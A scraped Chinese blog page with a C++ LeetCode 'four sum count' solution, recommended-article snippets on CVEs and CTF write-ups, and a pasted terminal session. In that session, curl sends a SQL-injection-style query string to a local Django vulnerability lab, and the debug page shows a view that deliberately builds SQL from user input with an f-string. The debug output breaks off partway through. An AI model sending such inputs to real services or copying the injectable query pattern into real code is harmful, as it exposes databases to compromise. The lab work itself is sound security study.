lc 2020-11-27

最新推荐文章于 2025-11-25 22:34:40 发布
原创 最新推荐文章于 2025-11-25 22:34:40 发布 · 216 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种解决四数之和问题的高效算法实现,通过使用哈希映射存储两个数组的所有可能组合之和及其出现次数,再查找剩余两个数组组合的补数是否存在,从而计算出所有加起来为零的四元组数量。

#454

class Solution {
public:
    int fourSumCount(vector<int>& A, vector<int>& B, vector<int>& C, vector<int>& D) {
        map<int, int> sum1, sum2;
        for(int i = 0; i < A.size(); ++i) {
            for(int j = 0 ; j < B.size() ; ++ j) {
                sum1[A[i] + B[j]] ++;
            }
        }
        for(int i = 0; i < C.size(); ++i) {
            for(int j = 0; j < D.size(); ++j) {
                sum2[C[i]+D[j]] ++;  //可直接计算,不需要第二个map
            }
        }
        int res = 0;
        for(auto i : sum1) {
            res += (i.second * sum2[-i.first]);
        }

        return res;
    }
};

感人:

执行用时:
1240 ms
, 在所有 C++ 提交中击败了
5.03%
的用户
内存消耗:
71.3 MB
, 在所有 C++ 提交中击败了
5.02%
的用户

Exchange-CVE-2020-0688(RCE)
bring_coco的博客
08-29 732
当攻击者通过各种手段获得一个可以访问Exchange Control Panel (ECP)组件的用户账号密码,就可以在被攻击的exchange上执行任意代码,直接获取服务器权限。CVE-2020-0688也是因为viewstate反序列化。
2021-11-09bulidlfs
Crazyingamazying的博客
11-09 1130
#Revision history #V1.1 zhaoxiaohu 2021.07.04 #V1.2 libaolin 2021.07.08 # # Linux From Scratch # Version 7.7-systemd # # Created by Gerard Beekmans # Edited by Matthew Burgess and Armin K. # # Implementer: Andrew Zhao # Create Date: 4-14-202...
使用mailR群发邮件_2020-11-20
孤星夜神的博客
11-20 897
不得不说这是一个很牛的R包,非常实用!mailR包依赖Java环境,所有需要提前在Window10电脑上安装Java,配置JAVA_HOME变量,然后安装rJava,再安装mailR。再执行下面的代码: ## 1.导入R包 library(mailR) library(rJava) ## 2.获取附件文件的路径信息 # 获取当前日期信息 date <- Sys.Date() # [1] "2020-11-20" date_time <- format(Sys.time(),fo.
2020-12-24
wubaoyu123的博客
12-24 160
博客园Logo 首页 新闻 博问 专区 闪存 班级 代码改变世界 搜索 注册 登录 博客园 首页 新随笔 联系 订阅 管理 随笔 - 36 文章 - 1 评论 - 0 k8s之深入解剖Pod(三) 目录: Pod的调度 Pod的扩容和缩容 Pod的滚动升级 一、Pod的调度 Pod只是容器的载体,通常需要通过RC、Deployment、DaemonSet、Job等对象来完成Pod的调度和自动控制功能。 1、RC、Deployment全自动调度 RC的主要功能之一就是自动部署一个容器应用的多份副本,以及持
2020-12-23
qq_52243324的博客
12-23 179
命令模式下的命令执行(实验三)
2020+11-16
qq_52040692的博客
12-23 146
命令模式下的命令执行(实验三) 注:Linux系统的命令窗口中,英文大小写字母是不同的,如ABC和abc。先进入命令模式窗口(按下Ctrl+Alt+f2,有些是f5等)然后依次输出用户名和密码加回车后会得到如下 电脑光标的地方就是等待输入的命令。执行命令的方法规律:[用户名@study ~] command [-options ] parameter1 parameter2自己可以自行运行如下命令 :1.ls -al ~(列出所有隐藏文件与文件属性) 2.date (结果显示日期与时间)如果没有区分大小写
公众号文章集合-2020整理回顾
thelostworld
01-01 1619
公众号运营快一年,都是记录个人工作记录和分享,自己也比较佛系,有觉得发的必要才发,最近整理了一下一年来的相关的公众号推文(也把相关的文章进行归类整理一下)。 一、漏洞复现(原创) 1、CVE -2020-13942 (Apache Unomi 远程代码执行漏洞)复现 https://mp.weixin.qq.com/s/fQSRXk9FilS4ImUOH5lvuQ 2、CVE-2020-9484 (Tomcat cluster sync-session)复现 htt...
2025年--Lc282-1327. 列出指定时间段内所有的下单产品-sql版
zsysingapore的博客
11-25 732
2020 年 2 月份下单 product_id = 1 的产品的数目总和为 (60 + 70) = 130。2020 年 2 月份下单 product_id = 5 的产品的数目总和为 (50 + 50) = 100。2020 年 2 月份下单 product_id = 3 的产品的数目总和为 (2 + 3) = 5。写一个解决方案,要求获取在 2020 年 2 月份下单的数量不少于 100 的产品的名字和数目。2020 年 2 月份下单 product_id = 2 的产品的数目总和为 80。
Biostrings包测试1_2020-01-29
热门推荐
孤星夜神的博客
01-29 3万+
Biostrings包测试1_20200129Wednesday 1.设置当前工作目录 setwd(“Biostrings/”) 2.导入R包 library(Biostrings) 3.R包简要信息 3.1 Description Package: Biostrings Title: Efficient manipulation of biological strings Description...
leetcode285-LC_Practice:LC_实践
07-06
2020年1月10日11月15日2020年1月11日238 16 5 121 198 561 2020年1月12日27 139 2020年1月13日9 64 120 152 279 2020年1月14日3 6 13 309 859 2020年1月15日7 12 18 20 62 66 136 535 771 2020年1月16日2020年1月17...
【CTF题解NO.00003】moeCTF 2020 - official write up by arttnba3
arttnba3的博客
11-20 5431
github pages blog addr 文章目录[github pages blog addr](https://archive.next.arttnba3.cn/2020/09/07/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x03%E3%80%91moeCTF2020-write-up-by-arttnb3/)0x00.绪论0x01.PwnPwn从入门到入狱WelcomeBaby Pwn - ret2textBaby Shellcode - shellcodeunusual
阅读笔记(JVCIR 2020)A view-free image stitching network based on global homography
小秋在路上~
02-01 477
图像拼接是一项传统但具有挑战性的计算机视觉任务,其目标是获得无缝的全景图像。最近,研究人员开始利用深度学习来研究图像拼接任务。然而,现有的学习方法在图像捕获过程中假设了一个相对固定的视图,因此对灵活视图的泛化能力较差。(这些模型在训练时没有足够考虑到视角的变化,或者训练数据中缺乏足够多样性的视角信息。)为了解决上述问题,我们提出了一种基于全局单应的级联无视图图像拼接网络。这种新颖的图像拼接网络不受图像视图的限制,可以分三个阶段实现。特别地,我们首先从不同的角度估计两个输入图像之间的全局单应性。然后提出了一个
网球比赛YOLO视觉分析.zip
01-07
网球比赛YOLO视觉分析.zip
【顶级EI完美复现】电力系统碳排放流的计算方法【IEEE 14节点】(Matlab代码实现)
01-07
【顶级EI完美复现】电力系统碳排放流的计算方法【IEEE 14节点】(Matlab代码实现)内容概要:本文介绍了基于IEEE 14节点电力系统的碳排放流计算方法,并提供了Matlab代码实现,属于顶级EI期刊级别的研究成果复现。该方法通过建立电力系统中各节点的碳排放流动模型,结合潮流计算与电源出力特性,量化不同机组和线路的碳排放责任,进而实现对电力系统低碳运行的评估与优化。文中详细阐述了算法原理、数学模型构建及仿真步骤,适用于电力系统低碳化分析与碳足迹追踪研究。; 适合人群:具备电力系统基础知识和Matlab编程能力的高校研究生、科研人员及从事能源系统低碳化研究的专业技术人员,尤其适合致力于高水平论文复现与算法开发的研究者。; 使用场景及目标:①用于电力系统碳排放流的精确建模与可视化分析;②支撑“双碳”背景下电网低碳调度、绿色电力溯源与碳配额分配等应用场景;③为撰写高水平学术论文(如EI/SCI)提供可复现的技术路径与代码基础。; 阅读建议:建议读者结合IEEE 14节点系统标准数据,逐步运行并调试所提供的Matlab代码,深入理解碳流分配逻辑与矩阵运算实现方式,同时可拓展至其他节点系统以验证算法通用性。
Android多线程下载
01-07
源码地址: https://pan.quark.cn/s/dcbecb73e50d M3U8-Downloader-Build Release Download M3U8-Downloader 直接下载 M3U8-Downloader是基于Electron框架开发的一款可以下载、播放HLS视频流的APP,功能特点如下: 流程原理图 -- -- 官网 M3U8-Downloader 官网 QQ交流群:341972319 点我加QQ交流群 获取M3U8视频地址 在chrome浏览器打开视频网页,按下F12,页签点击到Network页面,在Filter框里输入"m3u8",然后按F5刷新页面,如果网页里的视频使用的是HLS源,就可以在这里捕获到视频流地址,然后选中右键 Copy -> Copy Link Address. 提供m3u8源地址,下载并无损转码Mp4文件 自定义头添加-视频教程 下载可执行包 [推荐] 蓝奏下载 Windows 、Linux、MacOS 下载 下载 Releases下载 运行源码 NodeJS开发环境搭建 安装NodeJs最新版,NodeJs Download Clone 代码 在任意文件夹下新建一个文件夹存放代码,并执行以下命令 Yarn 环境安装 Package 依赖安装 运行M3U8-Downloader 打包发布 Enjoy it 赞赏 赞赏链接
基于STM32 F4的永磁同步电机无位置传感器控制策略研究
最新发布
01-07
基于STM32 F4的永磁同步电机无位置传感器控制策略研究内容概要:本文围绕基于STM32 F4的永磁同步电机(PMSM)无位置传感器控制策略展开研究,重点探讨在不依赖物理位置传感器的情况下,如何通过算法实现对电机转子位置和速度的精确估计与控制。文中结合嵌入式开发平台STM32 F4,采用如滑模观测器、扩展卡尔曼滤波或高频注入法等先进观测技术,实现对电机反电动势或磁链的估算,进而完成无传感器矢量控制(FOC)。同时,研究涵盖系统建模、控制算法设计、仿真验证(可能使用Simulink)以及在STM32硬件平台上的代码实现与调试,旨在提高电机控制系统的可靠性、降低成本并增强环境适应性。; 适合人群:具备一定电力电子、自动控制理论基础和嵌入式开发经验的电气工程、自动化及相关专业的研究生、科研人员及从事电机驱动开发的工程师。; 使用场景及目标:①掌握永磁同步电机无位置传感器控制的核心原理与实现方法;②学习如何在STM32平台上进行电机控制算法的移植与优化;③为开发高性能、低成本的电机驱动系统提供技术参考与实践指导。; 阅读建议:建议读者结合文中提到的控制理论、仿真模型与实际代码实现进行系统学习,有条件者应在实验平台上进行验证,重点关注观测器设计、参数整定及系统稳定性分析等关键环节。
QSPI协议解析包(基于PulseView软件使用)
01-07
1. 在PulseView软件中,可用于解析QSPI协议 2. 当前作者只验证过QSPI的4线写指令、单线读指令,其他指令暂未验证。
Supervisely转YOLOv5格式工具.zip
01-07
Supervisely转YOLOv5格式工具.zip
基于YOLO的安全带检测系统.zip
01-07
基于YOLO的安全带检测系统.zip
zzz@zzz-virtual-machine:~/Desktop$ curl -H "Host: localhost" "http://192.168.20.128:8000/?geom=SRID=4326;SELECT%20version();--" <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="NONE,NOARCHIVE"> <title>OperationalError at /</title> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; background-color:#fff; color:#000; } body>div { border-bottom:1px solid #ddd; } h1 { font-weight:normal; } h2 { margin-bottom:.8em; } h3 { margin:1em 0 .5em 0; } h4 { margin:0 0 .5em 0; font-weight: normal; } code, pre { font-size: 100%; white-space: pre-wrap; } table { border:1px solid #ccc; border-collapse: collapse; width:100%; background:white; } tbody td, tbody th { vertical-align:top; padding:2px 3px; } thead th { padding:1px 6px 1px 3px; background:#fefefe; text-align:left; font-weight:normal; font-size:11px; border:1px solid #ddd; } tbody th { width:12em; text-align:right; color:#666; padding-right:.5em; } table.vars { margin:5px 0 2px 40px; } table.vars td, table.req td { font-family:monospace; } table td.code { width:100%; } table td.code pre { overflow:hidden; } table.source th { color:#666; } table.source td { font-family:monospace; white-space:pre; border-bottom:1px solid #eee; } ul.traceback { list-style-type:none; color: #222; } ul.traceback li.frame { padding-bottom:1em; color:#4f4f4f; } ul.traceback li.user { background-color:#e0e0e0; color:#000 } div.context { padding:10px 0; overflow:hidden; } div.context ol { padding-left:30px; margin:0 10px; list-style-position: inside; } div.context ol li { font-family:monospace; white-space:pre; color:#777; cursor:pointer; padding-left: 2px; } div.context ol li pre { display:inline; } div.context ol.context-line li { color:#464646; background-color:#dfdfdf; padding: 3px 2px; } div.context ol.context-line li span { position:absolute; right:32px; } .user div.context ol.context-line li { background-color:#bbb; color:#000; } .user div.context ol li { color:#666; } div.commands { margin-left: 40px; } div.commands a { color:#555; text-decoration:none; } .user div.commands a { color: black; } #summary { background: #ffc; } #summary h2 { font-weight: normal; color: #666; } #explanation { background:#eee; } #template, #template-not-exist { background:#f6f6f6; } #template-not-exist ul { margin: 0 0 10px 20px; } #template-not-exist .postmortem-section { margin-bottom: 3px; } #unicode-hint { background:#eee; } #traceback { background:#eee; } #requestinfo { background:#f6f6f6; padding-left:120px; } #summary table { border:none; background:transparent; } #requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; } #requestinfo h3 { margin-bottom:-1em; } .error { background: #ffc; } .specific { color:#cc3300; font-weight:bold; } h2 span.commands { font-size:.7em; font-weight:normal; } span.commands a:link {color:#5E5694;} pre.exception_value { font-family: sans-serif; color: #575757; font-size: 1.5em; margin: 10px 0 10px 0; } .append-bottom { margin-bottom: 10px; } </style> <script type="text/javascript"> function hideAll(elems) { for (var e = 0; e < elems.length; e++) { elems[e].style.display = 'none'; } } window.onload = function() { hideAll(document.querySelectorAll('table.vars')); hideAll(document.querySelectorAll('ol.pre-context')); hideAll(document.querySelectorAll('ol.post-context')); hideAll(document.querySelectorAll('div.pastebin')); } function toggle() { for (var i = 0; i < arguments.length; i++) { var e = document.getElementById(arguments[i]); if (e) { e.style.display = e.style.display == 'none' ? 'block': 'none'; } } return false; } function varToggle(link, id) { toggle('v' + id); var s = link.getElementsByTagName('span')[0]; var uarr = String.fromCharCode(0x25b6); var darr = String.fromCharCode(0x25bc); s.textContent = s.textContent == uarr ? darr : uarr; return false; } function switchPastebinFriendly(link) { s1 = "Switch to copy-and-paste view"; s2 = "Switch back to interactive view"; link.textContent = link.textContent.trim() == s1 ? s2: s1; toggle('browserTraceback', 'pastebinTraceback'); return false; } </script> </head> <body> <div id="summary"> <h1>OperationalError at /</h1> <pre class="exception_value">no such column: None</pre> <table class="meta"> <tr> <th>Request Method:</th> <td>GET</td> </tr> <tr> <th>Request URL:</th> <td>http://localhost/?geom=SRID=4326;SELECT%20version();--</td> </tr> <tr> <th>Django Version:</th> <td>3.0.3</td> </tr> <tr> <th>Exception Type:</th> <td>OperationalError</td> </tr> <tr> <th>Exception Value:</th> <td><pre>no such column: None</pre></td> </tr> <tr> <th>Exception Location:</th> <td>/root/django_cve_2020_9402/app/views.py in index, line 10</td> </tr> <tr> <th>Python Executable:</th> <td>/usr/bin/python3</td> </tr> <tr> <th>Python Version:</th> <td>3.10.12</td> </tr> <tr> <th>Python Path:</th> <td><pre>['/root/django_cve_2020_9402', '/usr/lib/python310.zip', '/usr/lib/python3.10', '/usr/lib/python3.10/lib-dynload', '/usr/local/lib/python3.10/dist-packages', '/usr/lib/python3/dist-packages']</pre></td> </tr> <tr> <th>Server time:</th> <td>Sun, 30 Nov 2025 15:18:38 +0000</td> </tr> </table> </div> <div id="traceback"> <h2>Traceback <span class="commands"><a href="#" onclick="return switchPastebinFriendly(this);"> Switch to copy-and-paste view</a></span> </h2> <div id="browserTraceback"> <ul class="traceback"> <li class="frame django"> <code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/exception.py</code> in <code>inner</code> <div class="context" id="c139322623517440"> <ol start="27" class="pre-context" id="pre139322623517440"> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> This decorator is automatically applied to all middleware to ensure that</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> no middleware leaks an exception and that the next middleware in the stack</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> can rely on getting a response instead of an exception.</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> """</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> @wraps(get_response)</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> def inner(request):</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> try:</pre></li> </ol> <ol start="34" class="context-line"> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> response = get_response(request)</pre> <span>…</span></li> </ol> <ol start='35' class="post-context" id="post139322623517440"> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> except Exception as exc:</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> response = response_for_exception(request, exc)</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> return response</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre> return inner</pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre></pre></li> <li onclick="toggle('pre139322623517440', 'post139322623517440')"><pre></pre></li> </ol> </div> <div class="commands"> <a href="#" onclick="return varToggle(this, '139322623517440')"><span>▶</span> Local vars</a> </div> <table class="vars" id="v139322623517440"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>exc</td> <td class="code"><pre>OperationalError('no such column: None')</pre></td> </tr> <tr> <td>get_response</td> <td class="code"><pre><bound method BaseHandler._get_response of <django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0>></pre></td> </tr> <tr> <td>request</td> <td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version();--'></pre></td> </tr> </tbody> </table> </li> <li class="frame django"> <code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code> <div class="context" id="c139322623522112"> <ol start="108" class="pre-context" id="pre139322623522112"> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> break</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre></pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> if response is None:</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> wrapped_callback = self.make_view_atomic(callback)</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> try:</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> response = wrapped_callback(request, *callback_args, **callback_kwargs)</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> except Exception as e:</pre></li> </ol> <ol start="115" class="context-line"> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> response = self.process_exception_by_middleware(e, request)</pre> <span>…</span></li> </ol> <ol start='116' class="post-context" id="post139322623522112"> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre></pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> # Complain if the view returned None (a common error).</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> if response is None:</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> if isinstance(callback, types.FunctionType): # FBV</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> view_name = callback.__name__</pre></li> <li onclick="toggle('pre139322623522112', 'post139322623522112')"><pre> else: # CBV</pre></li> </ol> </div> <div class="commands"> <a href="#" onclick="return varToggle(this, '139322623522112')"><span>▶</span> Local vars</a> </div> <table class="vars" id="v139322623522112"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>callback</td> <td class="code"><pre><function index at 0x7eb694005a20></pre></td> </tr> <tr> <td>callback_args</td> <td class="code"><pre>()</pre></td> </tr> <tr> <td>callback_kwargs</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>middleware_method</td> <td class="code"><pre><bound method CsrfViewMiddleware.process_view of <django.middleware.csrf.CsrfViewMiddleware object at 0x7eb69376d660>></pre></td> </tr> <tr> <td>request</td> <td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version();--'></pre></td> </tr> <tr> <td>resolver</td> <td class="code"><pre><URLResolver 'vuln.urls' (None:None) '^/'></pre></td> </tr> <tr> <td>resolver_match</td> <td class="code"><pre>ResolverMatch(func=app.views.index, args=(), kwargs={}, url_name=None, app_names=[], namespaces=[], route=)</pre></td> </tr> <tr> <td>response</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>self</td> <td class="code"><pre><django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0></pre></td> </tr> <tr> <td>wrapped_callback</td> <td class="code"><pre><function index at 0x7eb694005a20></pre></td> </tr> </tbody> </table> </li> <li class="frame django"> <code>/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py</code> in <code>_get_response</code> <div class="context" id="c139322623521664"> <ol start="106" class="pre-context" id="pre139322623521664"> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> response = middleware_method(request, callback, callback_args, callback_kwargs)</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> if response:</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> break</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre></pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> if response is None:</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> wrapped_callback = self.make_view_atomic(callback)</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> try:</pre></li> </ol> <ol start="113" class="context-line"> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> response = wrapped_callback(request, *callback_args, **callback_kwargs)</pre> <span>…</span></li> </ol> <ol start='114' class="post-context" id="post139322623521664"> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> except Exception as e:</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> response = self.process_exception_by_middleware(e, request)</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre></pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> # Complain if the view returned None (a common error).</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> if response is None:</pre></li> <li onclick="toggle('pre139322623521664', 'post139322623521664')"><pre> if isinstance(callback, types.FunctionType): # FBV</pre></li> </ol> </div> <div class="commands"> <a href="#" onclick="return varToggle(this, '139322623521664')"><span>▶</span> Local vars</a> </div> <table class="vars" id="v139322623521664"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>callback</td> <td class="code"><pre><function index at 0x7eb694005a20></pre></td> </tr> <tr> <td>callback_args</td> <td class="code"><pre>()</pre></td> </tr> <tr> <td>callback_kwargs</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>middleware_method</td> <td class="code"><pre><bound method CsrfViewMiddleware.process_view of <django.middleware.csrf.CsrfViewMiddleware object at 0x7eb69376d660>></pre></td> </tr> <tr> <td>request</td> <td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version();--'></pre></td> </tr> <tr> <td>resolver</td> <td class="code"><pre><URLResolver 'vuln.urls' (None:None) '^/'></pre></td> </tr> <tr> <td>resolver_match</td> <td class="code"><pre>ResolverMatch(func=app.views.index, args=(), kwargs={}, url_name=None, app_names=[], namespaces=[], route=)</pre></td> </tr> <tr> <td>response</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>self</td> <td class="code"><pre><django.core.handlers.wsgi.WSGIHandler object at 0x7eb69376d8d0></pre></td> </tr> <tr> <td>wrapped_callback</td> <td class="code"><pre><function index at 0x7eb694005a20></pre></td> </tr> </tbody> </table> </li> <li class="frame user"> <code>/root/django_cve_2020_9402/app/views.py</code> in <code>index</code> <div class="context" id="c139322623518016"> <ol start="3" class="pre-context" id="pre139322623518016"> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre>import sqlite3</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre></pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre>def index(request):</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> id = request.GET.get('id')</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> # 漏洞点:直接拼接 SQL,触发注入</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> conn = sqlite3.connect('db.sqlite3')</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> cursor = conn.cursor()</pre></li> </ol> <ol start="10" class="context-line"> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> cursor.execute(f"SELECT id, name FROM app_userinfo WHERE id = {id}")</pre> <span>…</span></li> </ol> <ol start='11' class="post-context" id="post139322623518016"> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> results = cursor.fetchall()</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> conn.close()</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> data = [{'id': row[0], 'name': row[1]} for row in results]</pre></li> <li onclick="toggle('pre139322623518016', 'post139322623518016')"><pre> return JsonResponse(data, safe=False)</pre></li> </ol> </div> <div class="commands"> <a href="#" onclick="return varToggle(this, '139322623518016')"><span>▶</span> Local vars</a> </div> <table class="vars" id="v139322623518016"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>conn</td> <td class="code"><pre><sqlite3.Connection object at 0x7eb694722d40></pre></td> </tr> <tr> <td>cursor</td> <td class="code"><pre><sqlite3.Cursor object at 0x7eb693681040></pre></td> </tr> <tr> <td>id</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>request</td> <td class="code"><pre><WSGIRequest: GET '/?geom=SRID=4326;SELECT%20version();--'></pre></td> </tr> </tbody> </table> </li> </ul> </div> <form action="http://dpaste.com/" name="pasteform" id="pasteform" method="post"> <div id="pastebinTraceback" class="pastebin"> <input type="hidden" name="language" value="PythonConsole"> <input type="hidden" name="title" value="OperationalError at /"> <input type="hidden" name="source" value="Django Dpaste Agent"> <input type="hidden" name="poster" value="Django"> <textarea name="content" id="traceback_area" cols="140" rows="25"> Environment: Request Method: GET Request URL: http://localhost/?geom=SRID=4326;SELECT%20version();-- Django Version: 3.0.3 Python Version: 3.10.12 Installed Applications: ['django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'app'] Installed Middleware: ['django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware'] Traceback (most recent call last): File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/usr/local/lib/python3.10/dist-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/root/django_cve_2020_9402/app/views.py", line 10, in index cursor.execute(f"SELECT id, name FROM app_userinfo WHERE id = {id}") Exception Type: OperationalError at / Exception Value: no such column: None </textarea> <br><br> <input type="submit" value="Share this traceback on a public website"> </div> </form> </div> <div id="requestinfo"> <h2>Request information</h2> <h3 id="user-info">USER</h3> <p>AnonymousUser</p> <h3 id="get-info">GET</h3> <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>geom</td> <td class="code"><pre>'SRID=4326'</pre></td> </tr> <tr> <td>SELECT version()</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>--</td> <td class="code"><pre>''</pre></td> </tr> </tbody> </table> <h3 id="post-info">POST</h3> <p>No POST data</p> <h3 id="files-info">FILES</h3> <p>No FILES data</p> <h3 id="cookie-info">COOKIES</h3> <p>No cookie data</p> <h3 id="meta-info">META</h3> <table class="req"> <thead> <tr> <th>Variable</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>COLORTERM</td> <td class="code"><pre>'truecolor'</pre></td> </tr> <tr> <td>CONTENT_LENGTH</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>CONTENT_TYPE</td> <td class="code"><pre>'text/plain'</pre></td> </tr> <tr> <td>DEBUGINFOD_URLS</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>DISPLAY</td> <td class="code"><pre>':0'</pre></td> </tr> <tr> <td>DJANGO_SETTINGS_MODULE</td> <td class="code"><pre>'vuln.settings'</pre></td> </tr> <tr> <td>GATEWAY_INTERFACE</td> <td class="code"><pre>'CGI/1.1'</pre></td> </tr> <tr> <td>HOME</td> <td class="code"><pre>'/root'</pre></td> </tr> <tr> <td>HTTP_ACCEPT</td> <td class="code"><pre>'*/*'</pre></td> </tr> <tr> <td>HTTP_HOST</td> <td class="code"><pre>'localhost'</pre></td> </tr> <tr> <td>HTTP_USER_AGENT</td> <td class="code"><pre>'curl/7.81.0'</pre></td> </tr> <tr> <td>LANG</td> <td class="code"><pre>'en_US.UTF-8'</pre></td> </tr> <tr> <td>LANGUAGE</td> <td class="code"><pre>'en_US:'</pre></td> </tr> <tr> <td>LC_ADDRESS</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_IDENTIFICATION</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_MEASUREMENT</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_MONETARY</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_NAME</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_NUMERIC</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_PAPER</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_TELEPHONE</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LC_TIME</td> <td class="code"><pre>'zh_CN.UTF-8'</pre></td> </tr> <tr> <td>LESSCLOSE</td> <td class="code"><pre>'/usr/bin/lesspipe %s %s'</pre></td> </tr> <tr> <td>LESSOPEN</td> <td class="code"><pre>'| /usr/bin/lesspipe %s'</pre></td> </tr> <tr> <td>LOGNAME</td> <td class="code"><pre>'root'</pre></td> </tr> <tr> <td>LS_COLORS</td> <td 